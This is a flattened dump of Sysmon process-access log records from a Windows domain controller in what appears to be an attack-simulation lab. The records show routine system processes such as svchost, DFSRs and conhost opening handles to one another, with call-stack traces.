09:20:19.479{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053739Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.479{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053738Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.479{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053737Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.479{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053736Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.464{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053735Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.464{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053734Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.464{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053733Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.464{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053732Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.464{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053731Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.464{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053730Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.464{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053729Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.464{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053728Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.464{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053727Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.448{5EBD8912-8CC0-6151-1600-00000000FD01}12961780C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\system32\DFSRs.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+261b7|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+12d0|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001053726Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.448{5EBD8912-8CC0-6151-1600-00000000FD01}12961780C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+25d35|C:\Windows\system32\wbem\wmiprvsd.dll+2619d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+12d0|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000001053725Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.448{5EBD8912-8CC0-6151-1600-00000000FD01}12961780C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+12d0|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c 10341000x80000000000000001053724Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.448{5EBD8912-8CC0-6151-1600-00000000FD01}12961780C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+12d0|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053723Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.448{5EBD8912-8CC0-6151-1600-00000000FD01}12961780C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+5a1b8|C:\Windows\system32\wbem\wmiprvsd.dll+35a49|C:\Windows\system32\wbem\wmiprvsd.dll+2807f|C:\Windows\system32\wbem\wmiprvsd.dll+29591|C:\Windows\system32\wbem\wmiprvsd.dll+292c2|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+12d0|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053722Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.448{5EBD8912-8CC0-6151-1600-00000000FD01}12961780C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+264a1|C:\Windows\system32\wbem\wmiprvsd.dll+2669f|C:\Windows\system32\wbem\wmiprvsd.dll+25c4b|C:\Windows\system32\wbem\wmiprvsd.dll+27476|C:\Windows\system32\wbem\wmiprvsd.dll+27db2|C:\Windows\system32\wbem\wmiprvsd.dll+277c9|C:\Windows\system32\wbem\wmiprvsd.dll+26100|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+12d0|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c 10341000x80000000000000001053721Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.448{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD3-6151-4E00-00000000FD01}3348C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053720Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.448{5EBD8912-8CD0-6151-2E00-00000000FD01}23842484C:\Windows\system32\DFSRs.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmidcprv.dll+163a4|C:\Windows\system32\wbem\wmidcprv.dll+166e0|C:\Windows\system32\wbem\wmidcprv.dll+abad|C:\Windows\system32\wbem\wmidcprv.dll+b57e|C:\Windows\system32\DFSRs.exe+d847d|C:\Windows\system32\DFSRs.exe+c3ca|C:\Windows\system32\DFSRs.exe+51c1|C:\Windows\system32\DFSRs.exe+73b2|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053719Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.447{5EBD8912-8CC0-6151-1600-00000000FD01}12961780C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\system32\DFSRs.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+261b7|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+12d0|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001053718Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.447{5EBD8912-8CC0-6151-1600-00000000FD01}12961780C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+25d35|C:\Windows\system32\wbem\wmiprvsd.dll+2619d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+12d0|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000001053717Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 